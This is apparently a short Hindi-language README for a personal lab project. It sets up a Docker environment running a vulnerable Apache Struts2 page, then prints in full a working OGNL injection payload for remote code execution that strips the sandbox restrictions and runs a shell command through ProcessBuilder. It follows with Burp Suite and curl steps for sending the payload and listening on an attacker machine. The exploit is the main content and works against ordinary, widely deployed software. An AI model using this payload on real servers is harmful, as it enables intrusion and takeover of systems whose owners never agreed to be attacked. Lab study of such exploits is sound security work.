
RCE परियोजना
दिए गए पेलोड से RCE हमला संभव है।
निम्नलिखित एक पृथक, व्यक्तिगत प्रयोगशाला में परीक्षण और सत्यापन के लिए वातावरण और उपकरणों की सूची है।
निम्नलिखित कमांड का उपयोग करके:
docker compose up -d
आप वातावरण चला सकते हैं। उसके बाद आप http://<YOUR_IP>:8080/hello.action पर जाकर एक सबमिशन पृष्ठ देख सकते हैं।
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
RCE हमले को निष्पादित करने के लिए Burp Suite का उपयोग करना आवश्यक है। Burp Suite का उपयोग करते समय, पेलोड सबमिट करें। पेलोड सबमिट करने के बाद सही लॉग (POST) ढूंढें और इसे कर्ल कमांड में बदलें। अंत में, अपनी हमलावर मशीन खोलें और लिसनर पोर्ट से अपना कर्ल कमांड भेजने के बाद पोर्ट पर सुनें।
सेंसर किए गए क्षेत्र IP पते हैं।